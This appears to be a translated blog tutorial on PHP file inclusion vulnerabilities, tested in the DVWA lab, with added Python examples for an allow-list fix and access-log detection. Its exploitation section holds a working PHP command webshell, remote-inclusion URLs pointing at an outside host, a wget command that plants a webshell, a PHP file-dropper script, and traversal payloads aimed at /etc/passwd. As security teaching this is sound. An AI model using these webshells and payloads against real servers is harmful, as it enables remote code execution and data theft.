DVWA Article IV: File Inclusion Vulnerability



1      Test Environment Introduction

The test environment is the DVWA module in the OWASP environment.

2      Test Instructions

2.1  What is a remote file inclusion vulnerability?

What is a "remote file inclusion vulnerability"? Briefly: the server uses PHP's include-type functions to pull in a file, but the source of the included file is not strictly filtered, so the server can be made to include a malicious file, and that file can be constructed to do whatever the attacker intends.

Dangerous functions involved: include(), require(), include_once() and require_once().

include: includes and runs the specified file. If an error occurs with the included file, PHP issues a warning, but the rest of the PHP file continues to execute.

require: the only difference from include is what happens on error: include keeps running, while require stops execution.

include_once: almost identical to include, except that it first checks whether the file has already been included; if it has, it is not included again.

require_once: differs from require in the same way include_once differs from include, as described above, so it is not repeated here.

php.ini configuration: with allow_url_fopen=Off, remote files cannot be included. PHP 4 has both remote and local inclusion; PHP 5 has only local inclusion.

2.2  Why include files?

Programmers do not like doing the same thing twice, or writing the same code (common functions, for instance) several times, so common code is put in a separate file such as share.php and then included from the other files that need it. In PHP the functions listed above do this. The workflow: to include share.php in main.php, write include("share.php") in main.php, after which the functions defined in share.php can be used. When the name of the included file is hard-coded like this there is naturally no problem and no vulnerability. So where exactly does the problem arise?

Sometimes it is not possible to decide in advance which file to include, as in the following index.php code:

CODE:

---------------------------------------------------------------------------------------------------

<?php
if ($_GET['page']) {
    include $_GET['page'];   // whatever the query string says is included, unchecked
} else {
    include "home.php";
}

---------------------------------------------------------------------------------------------------

This is an ordinary piece of PHP code. How does it work?

The above code may be used with URLs like these:

http://hi.baidu.com/m4r10/php/index.php?page=main.php or

http://hi.baidu.com/m4r10/php/index.php?page=downloads.php

Combined with the code above, this is briefly how it works:

1. Submit one of the URLs above; index.php reads the value of page from the query string ($_GET['page']).

2. It checks whether $_GET['page'] is non-empty; if so (here it is main.php), it uses include to include that file.

3. If $_GET['page'] is empty, the else branch runs and home.php is included.

2.3  Why does this create a vulnerability?

You may say: this is good, files can be included dynamically according to the URL, how convenient; how can that create a vulnerability? The answer is that we are not well-behaved: we like to be different from others and do not follow the author's links. We may want to choose the included (called) file ourselves, for example by entering a URL at random: http://hi.baidu.com/m4r10/php/index.php?page=hello.php. Our index.php then obediently follows the steps described above: it takes page as hello.php and executes include(hello.php). The problem appears because there is no hello.php file, so the include reports a warning similar to the following:

Quote:

Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/wwwroot/php/index.php on line 3

Warning: include() [function.include]: failed opening hello.php for inclusion (include_path=.:) in /vhost/wwwroot/php/index.php on line 3

Note the first warning: it simply says that the hello.php file we specified, i.e. the file at the path we supplied, cannot be found; the second warning says the specified file was not found when it was being included, hence the warning. In other words, index.php tried to include exactly the path given in the URL.
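The warnings above show that the dispatcher hands whatever ?page= carries straight to include. The following Python script is an added example, not code from the original article: it models the article's index.php logic as vulnerable_resolve() and sets a hardened hardened_resolve() beside it, which only includes a name from a fixed allow-list and additionally confirms that the resolved path stays under the web root. The allow-list contents and the base directory /srv/www/php are assumptions made for the demonstration.

```python
import os
import urllib.parse
from typing import Optional

# Assumption for this example: index.php only ever needs these three pages.
ALLOWED_PAGES = frozenset({"home.php", "main.php", "downloads.php"})


def vulnerable_resolve(base_dir: str, page: Optional[str]) -> str:
    """Model of the article's index.php: the ?page= value is included as-is.

    Nothing is checked, so '../../phpinfo.php', '/etc/passwd' and
    'http://host/cmd.txt' are all handed straight to include.
    """
    return page if page else os.path.join(base_dir, "home.php")


def hardened_resolve(base_dir: str, page: Optional[str]) -> Optional[str]:
    """Allow-list plus path-confinement version of the same dispatcher.

    Returns the absolute path that may be included, or None when the request
    must be refused (serve home.php or a 404 then, never echo the input).
    """
    if not page:
        page = "home.php"
    # Decode once more so a double-encoded value is judged on its real content.
    page = urllib.parse.unquote(page)
    # 1. Only a bare file name is acceptable: no separators (traversal), no
    #    ':' (http://, ftp://, php://, data: wrappers), no NUL (truncation).
    if any(ch in page for ch in "/\\:\x00"):
        return None
    # 2. The name must be one the application actually serves.
    if page not in ALLOWED_PAGES:
        return None
    # 3. Defence in depth: the resolved target must still live under base_dir
    #    (guards against an allowed page that is a symlink out of the web root).
    base = os.path.realpath(base_dir)
    resolved = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, resolved]) != base:
        return None
    return resolved


if __name__ == "__main__":
    # Constructed inputs, taken from the URLs used in the article.
    samples = [None, "main.php", "hello.php", "./txt.txt", "../../phpinfo.php",
               "/etc/passwd", "http://www.xxx.cn/cmd.txt?cmd=ls",
               "%2e%2e%2fphpinfo.php"]
    for s in samples:
        print(f"{s!r:40} vulnerable -> {vulnerable_resolve('/srv/www/php', s)!r:40} "
              f"hardened -> {hardened_resolve('/srv/www/php', s)!r}")
```

In PHP the same rule is a membership test against a small array of allowed names followed by realpath() and a prefix check on the result. The decisive step is the allow-list: a traversal sequence, absolute path or URL can never equal an entry in it, so the confinement check only has to cover the case where an allowed file itself points elsewhere.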

2.4  How the vulnerability is exploited

As seen above, the problem exists; so how is such a flaw used? There are many methods, but they are essentially the same. Three of the more common ones are described here:

1. Using include to read other files on the target machine

As seen above, we can arbitrarily specify other sensitive files on the target host. Since the absolute path is exposed (/vhost/wwwroot/php/), we can probe repeatedly to include other files, for example with the URL http://hi.baidu.com/m4r10/php/index.php?page=./txt.txt, which reads the txt.txt file in the current directory; ../ can be used to move between directories (when nothing is filtered), or an absolute path can be given directly to read a sensitive system file, e.g. http://hi.baidu.com/m4r10/php/index.php?page=/etc/passwd. If the target host does not restrict permissions strictly, or Apache runs with relatively high privileges, the contents of this file can be read; otherwise a warning such as "open_basedir restriction in effect" is returned.

2. Remote inclusion of a runnable PHP trojan

If allow_url_fopen is enabled on the target host (it is enabled by default, and few people change it), we have more room: we can specify a URL pointing to a PHP-code webshell elsewhere and have it run directly. For example, first write a piece of PHP code that runs a command and save it as cmd.txt (the extension does not matter, as long as the content is PHP):

CODE:

--------------------------------------------------------------------------------

<?php
if (get_magic_quotes_gpc()) {
    $_REQUEST["cmd"] = stripslashes($_REQUEST["cmd"]); // remove escape characters (strips backslashes from the string)
}
ini_set("max_execution_time", 0); // set the execution time for this file; 0 is unlimited
echo "M4r10 start line";          // print the returned start-line marker
passthru($_REQUEST["cmd"]);        // run the command specified by cmd
echo "M4r10 end line";            // print the returned end-line marker
?>

--------------------------------------------------------------------------------

The purpose of this file is to accept the command specified by cmd, execute it with passthru, and return the output between the "M4r10 start line" and "M4r10 end line" markers. Save this file on our own host (it can be a host without PHP support), as long as it can be reached over HTTP, e.g. at http://www.xxx.cn/cmd.txt. Then construct the following URL on the vulnerable host to use it: http://hi.baidu.com/m4r10/php/index.php?page=http://www.xxx.cn/cmd.txt?cmd=ls, where cmd is followed by the command to execute. Other common commands (taking *nix as an example) are as follows:

Quote:

ll      list the directory contents (equivalent to dir on Windows)

pwd     show the current absolute path

id / whoami     show the current user

wget    download the file at the specified URL

For the rest, search Baidu yourself; they are not listed here.

3. Including a PHP file that creates a file

Some people may feel that getting a real webshell onto the target machine is more reassuring: if one day someone finds and fixes the inclusion bug here, the "pseudo" webshell above can no longer be included remotely. That mentality is understandable, so let us continue. To get a real webshell, two common methods are described:

1) Use a command such as wget to download a webshell

This is relatively simple and very common. With the pseudo-webshell above we can execute commands, so we can call on the system's very powerful wget. Its strength can be googled; it has a dizzying number of parameters, but we do not need anything complicated: -O (--output-document=file, write the document to file) is enough.

As in the earlier steps, put a PHP-code webshell somewhere reachable over HTTP or FTP, e.g. http://www.xxx.cn/m4r10.txt; this file contains the webshell. Then execute the following URL through the pseudo-webshell obtained earlier: http://hi.baidu.com/m4r10/php/index.php?page=http://www.xxx.cn/cmd.txt?cmd=wget http://www.xxx.cn/m4r10.txt -O m4r10.php. If the current directory is writable, this yields a webshell called m4r10.php; if the current directory is not writable, other approaches are needed.

2) Use a file to create the file

The wget approach may run into a current directory that cannot be written, or wget may be disabled (or not installed) on the target host, so a workaround is needed: combine the inclusion vulnerability above with a file-creating (file-writing) PHP script with the following content:

CODE: [Copy to Clipboard]

--------------------------------------------------------------------------------------------------

<?php
$f = file_get_contents("http://www.xxx.cn/m4r10.txt"); // read the file at the specified URL
$ff = fopen("./upload/m4r10.php", "a");                // find a likely writable directory and create a file
fwrite($ff, $f);                                       // write the previously fetched content into the created file
fclose($ff);                                           // close and save the file
?>

--------------------------

3      Test Steps

This test only checks for sensitive-information disclosure through the file inclusion vulnerability.

http://1.1.1.10/dvwa/vulnerabilities/fi/?page=include.php


Edit the URL directly and replace include.php in the page parameter with ../../phpinfo.php; the content of the phpinfo.php page is then displayed directly.

http://1.1.1.10/dvwa/vulnerabilities/fi/?page=../../phpinfo.php

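Every request in section 2.4 and in the test step above leaves a distinctive page= parameter in the web server's access log, which is where a defender would look for this activity. As an added example (not part of the original article), the Python script below parses a constructed set of Apache combined-format log lines built from those URLs and flags each request whose page value is a traversal sequence, an absolute path, a remote URL or stream wrapper, a null byte, or simply a name the application does not serve. The client IPs, timestamps, response sizes and the KNOWN_PAGES set are constructed for the demonstration.

```python
import re
import urllib.parse
from typing import Dict, List

# Constructed Apache combined-format log lines. The request paths are the ones
# from the article; the client IPs, timestamps and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Nov/2016:10:01:02 +0800] "GET /php/index.php?page=main.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.5 - - [29/Nov/2016:10:01:09 +0800] "GET /php/index.php?page=hello.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
10.0.0.7 - - [29/Nov/2016:10:02:15 +0800] "GET /php/index.php?page=./txt.txt HTTP/1.1" 200 88 "-" "curl/7.47.0"
10.0.0.7 - - [29/Nov/2016:10:02:31 +0800] "GET /php/index.php?page=/etc/passwd HTTP/1.1" 200 1839 "-" "curl/7.47.0"
10.0.0.7 - - [29/Nov/2016:10:03:02 +0800] "GET /php/index.php?page=http://www.xxx.cn/cmd.txt?cmd=ls HTTP/1.1" 200 640 "-" "curl/7.47.0"
10.0.0.7 - - [29/Nov/2016:10:04:44 +0800] "GET /dvwa/vulnerabilities/fi/?page=../../phpinfo.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
10.0.0.9 - - [29/Nov/2016:10:05:10 +0800] "GET /dvwa/vulnerabilities/fi/?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.1" 200 1839 "-" "python-requests/2.9"
"""

# Assumption: the names the application legitimately serves via ?page=.
KNOWN_PAGES = frozenset({"home.php", "main.php", "downloads.php", "include.php"})

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.IGNORECASE)


def classify_page_param(value: str) -> List[str]:
    """Return the reasons a ?page= value looks like an inclusion attempt ([] if clean)."""
    decoded = urllib.parse.unquote(value)  # judge double-encoded input on its real content
    reasons = []
    if "\x00" in decoded:
        reasons.append("null-byte")          # path truncation trick on old PHP
    if ".." in decoded:
        reasons.append("traversal")          # ../../phpinfo.php
    if decoded.startswith(("/", "\\")):
        reasons.append("absolute-path")      # /etc/passwd
    if SCHEME_RE.match(decoded):
        reasons.append("remote-or-wrapper")  # http://, ftp://, php://, data:
    if decoded not in KNOWN_PAGES:
        reasons.append("unknown-page")       # hello.php and ./txt.txt probes
    return reasons


def scan_log(text: str) -> List[Dict]:
    """Parse combined-format lines and report every suspicious page= request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urllib.parse.urlsplit(m["url"]).query
        # parse_qs splits each pair on the first '=', so the nested
        # 'http://x/cmd.txt?cmd=ls' value survives intact for inspection.
        for value in urllib.parse.parse_qs(query, keep_blank_values=True).get("page", []):
            reasons = classify_page_param(value)
            if reasons:
                hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                             "page": value, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h['ts']}  {h['ip']:10}  {h['status']}  {h['page']!r:45}  {', '.join(h['reasons'])}")
```

The pattern checks alone would miss the hello.php and ./txt.txt probes from section 2.3 and 2.4, which look like ordinary local names; comparing against the set of pages the application really serves is what surfaces them. A 200 status next to a traversal or remote URL is the signal that the include actually succeeded and deserves a follow-up on that host.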

Reference link: http://www.2cto.com/article/201011/79036.html

File inclusion exploitation reference links:

http://ixuehua.blog.163.com/blog/static/2599520382016765417338/

http://ixuehua.blog.163.com/blog/static/2599520382016782242901/

This article is from the "Eagle a" blog; please keep this source: http://laoyinga.blog.51cto.com/11487316/1878154
